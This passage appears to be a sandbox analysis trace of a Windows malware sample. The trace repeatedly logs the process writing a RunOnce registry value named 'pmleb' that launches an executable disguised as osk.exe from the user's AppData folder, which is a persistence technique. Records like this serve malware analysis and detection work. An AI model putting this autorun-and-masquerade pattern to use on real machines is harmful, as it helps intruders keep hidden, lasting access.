uIDEvent=0x23c8) returned 1 [0103.404] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.405] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0103.405] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0103.405] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0103.405] RegCloseKey (hKey=0x280) returned 0x0 [0103.406] IUnknown:Release (This=0x7a9740) returned 0x1 [0103.406] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.406] SetTimer (hWnd=0x20280, nIDEvent=0x23c9, uElapse=0xa, lpTimerFunc=0x0) returned 0x23c9 [0103.406] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0103.418] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0103.418] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0103.418] KillTimer (hWnd=0x20280, uIDEvent=0x23c9) returned 1 [0103.418] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.419] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0103.419] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0103.419] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0103.419] RegCloseKey (hKey=0x280) returned 0x0 [0103.419] IUnknown:Release (This=0x7a9740) returned 0x1 [0103.419] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.420] SetTimer (hWnd=0x20280, nIDEvent=0x23ca, uElapse=0xa, lpTimerFunc=0x0) returned 0x23ca [0103.420] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0103.433] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0103.433] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0103.434] KillTimer (hWnd=0x20280, uIDEvent=0x23ca) returned 1 [0103.434] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.434] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0103.434] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0103.435] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0103.435] RegCloseKey (hKey=0x280) returned 0x0 [0103.435] IUnknown:Release (This=0x7a9740) returned 0x1 [0103.435] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.435] SetTimer (hWnd=0x20280, nIDEvent=0x23cb, uElapse=0xa, lpTimerFunc=0x0) returned 0x23cb [0103.435] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0103.449] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0103.449] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0103.449] KillTimer (hWnd=0x20280, uIDEvent=0x23cb) returned 1 [0103.450] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 
[0103.450] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0103.450] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0103.450] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0103.451] RegCloseKey (hKey=0x280) returned 0x0 [0103.451] IUnknown:Release (This=0x7a9740) returned 0x1 [0103.451] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.451] SetTimer (hWnd=0x20280, nIDEvent=0x23cc, uElapse=0xa, lpTimerFunc=0x0) returned 0x23cc [0103.451] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0103.474] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0103.474] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0103.474] KillTimer (hWnd=0x20280, uIDEvent=0x23cc) returned 1 [0103.475] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.475] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0103.475] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0103.475] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0103.475] RegCloseKey (hKey=0x280) returned 0x0 
[0103.475] IUnknown:Release (This=0x7a9740) returned 0x1 [0103.476] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.476] SetTimer (hWnd=0x20280, nIDEvent=0x23cd, uElapse=0xa, lpTimerFunc=0x0) returned 0x23cd [0103.476] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0103.481] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0103.481] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0103.481] KillTimer (hWnd=0x20280, uIDEvent=0x23cd) returned 1 [0103.481] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.482] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0103.482] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0103.482] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0103.482] RegCloseKey (hKey=0x280) returned 0x0 [0103.482] IUnknown:Release (This=0x7a9740) returned 0x1 [0103.482] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.482] SetTimer (hWnd=0x20280, nIDEvent=0x23ce, uElapse=0xa, lpTimerFunc=0x0) returned 0x23ce [0103.482] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0103.505] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0103.505] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0103.505] KillTimer (hWnd=0x20280, uIDEvent=0x23ce) returned 1 [0103.505] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.506] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0103.506] 
RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0103.506] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0103.506] RegCloseKey (hKey=0x280) returned 0x0 [0103.506] IUnknown:Release (This=0x7a9740) returned 0x1 [0103.506] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.506] SetTimer (hWnd=0x20280, nIDEvent=0x23cf, uElapse=0xa, lpTimerFunc=0x0) returned 0x23cf [0103.506] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0103.512] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0103.512] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0103.512] KillTimer (hWnd=0x20280, uIDEvent=0x23cf) returned 1 [0103.512] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.513] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0103.513] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0103.513] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0103.513] RegCloseKey (hKey=0x280) returned 0x0 [0103.513] IUnknown:Release (This=0x7a9740) returned 0x1 [0103.513] 
ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.513] SetTimer (hWnd=0x20280, nIDEvent=0x23d0, uElapse=0xa, lpTimerFunc=0x0) returned 0x23d0 [0103.513] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0103.527] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0103.527] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0103.527] KillTimer (hWnd=0x20280, uIDEvent=0x23d0) returned 1 [0103.527] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.528] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0103.528] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0103.528] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0103.528] RegCloseKey (hKey=0x280) returned 0x0 [0103.528] IUnknown:Release (This=0x7a9740) returned 0x1 [0103.528] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.528] SetTimer (hWnd=0x20280, nIDEvent=0x23d1, uElapse=0xa, lpTimerFunc=0x0) returned 0x23d1 [0103.529] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0103.543] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0103.543] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0103.543] KillTimer (hWnd=0x20280, uIDEvent=0x23d1) returned 1 [0103.543] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.543] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0103.544] RegCreateKeyExA (in: hKey=0x80000001, 
lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0103.544] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0103.544] RegCloseKey (hKey=0x280) returned 0x0 [0103.544] IUnknown:Release (This=0x7a9740) returned 0x1 [0103.544] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.544] SetTimer (hWnd=0x20280, nIDEvent=0x23d2, uElapse=0xa, lpTimerFunc=0x0) returned 0x23d2 [0103.544] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0103.558] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0103.558] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0103.558] KillTimer (hWnd=0x20280, uIDEvent=0x23d2) returned 1 [0103.559] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.559] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0103.559] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0103.559] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0103.560] RegCloseKey (hKey=0x280) returned 0x0 [0103.560] IUnknown:Release (This=0x7a9740) returned 0x1 [0103.560] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 
[0103.560] SetTimer (hWnd=0x20280, nIDEvent=0x23d3, uElapse=0xa, lpTimerFunc=0x0) returned 0x23d3 [0103.560] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0103.574] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0103.574] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0103.574] KillTimer (hWnd=0x20280, uIDEvent=0x23d3) returned 1 [0103.574] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.575] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0103.575] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0103.575] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0103.575] RegCloseKey (hKey=0x280) returned 0x0 [0103.576] IUnknown:Release (This=0x7a9740) returned 0x1 [0103.576] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.576] SetTimer (hWnd=0x20280, nIDEvent=0x23d4, uElapse=0xa, lpTimerFunc=0x0) returned 0x23d4 [0103.576] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0103.589] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0103.589] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0103.590] KillTimer (hWnd=0x20280, uIDEvent=0x23d4) returned 1 [0103.590] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.590] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0103.591] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, 
dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0103.591] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0103.591] RegCloseKey (hKey=0x280) returned 0x0 [0103.591] IUnknown:Release (This=0x7a9740) returned 0x1 [0103.591] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.591] SetTimer (hWnd=0x20280, nIDEvent=0x23d5, uElapse=0xa, lpTimerFunc=0x0) returned 0x23d5 [0103.591] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0103.606] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0103.606] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0103.606] KillTimer (hWnd=0x20280, uIDEvent=0x23d5) returned 1 [0103.606] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.607] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0103.607] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0103.607] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0103.607] RegCloseKey (hKey=0x280) returned 0x0 [0103.607] IUnknown:Release (This=0x7a9740) returned 0x1 [0103.608] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.608] SetTimer (hWnd=0x20280, nIDEvent=0x23d6, uElapse=0xa, lpTimerFunc=0x0) returned 0x23d6 
[0103.608] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0103.621] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0103.621] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0103.621] KillTimer (hWnd=0x20280, uIDEvent=0x23d6) returned 1 [0103.621] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.621] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0103.621] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0103.622] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0103.622] RegCloseKey (hKey=0x280) returned 0x0 [0103.622] IUnknown:Release (This=0x7a9740) returned 0x1 [0103.622] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.622] SetTimer (hWnd=0x20280, nIDEvent=0x23d7, uElapse=0xa, lpTimerFunc=0x0) returned 0x23d7 [0103.622] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0103.637] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0103.637] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0103.637] KillTimer (hWnd=0x20280, uIDEvent=0x23d7) returned 1 [0103.637] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.638] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0103.638] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: 
phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0103.638] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0103.638] RegCloseKey (hKey=0x280) returned 0x0 [0103.638] IUnknown:Release (This=0x7a9740) returned 0x1 [0103.638] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.638] SetTimer (hWnd=0x20280, nIDEvent=0x23d8, uElapse=0xa, lpTimerFunc=0x0) returned 0x23d8 [0103.638] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0103.652] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0103.652] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0103.652] KillTimer (hWnd=0x20280, uIDEvent=0x23d8) returned 1 [0103.652] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.652] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0103.652] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0103.653] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0103.653] RegCloseKey (hKey=0x280) returned 0x0 [0103.653] IUnknown:Release (This=0x7a9740) returned 0x1 [0103.653] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.653] SetTimer (hWnd=0x20280, nIDEvent=0x23d9, uElapse=0xa, lpTimerFunc=0x0) returned 0x23d9 [0103.653] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: 
lpMsg=0x33f7fc) returned 1 [0103.667] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0103.667] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0103.668] KillTimer (hWnd=0x20280, uIDEvent=0x23d9) returned 1 [0103.668] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.668] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0103.668] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0103.669] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0103.669] RegCloseKey (hKey=0x280) returned 0x0 [0103.669] IUnknown:Release (This=0x7a9740) returned 0x1 [0103.669] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.669] SetTimer (hWnd=0x20280, nIDEvent=0x23da, uElapse=0xa, lpTimerFunc=0x0) returned 0x23da [0103.669] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0103.683] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0103.683] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0103.683] KillTimer (hWnd=0x20280, uIDEvent=0x23da) returned 1 [0103.683] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.684] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0103.684] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0103.684] RegSetValueExA (in: 
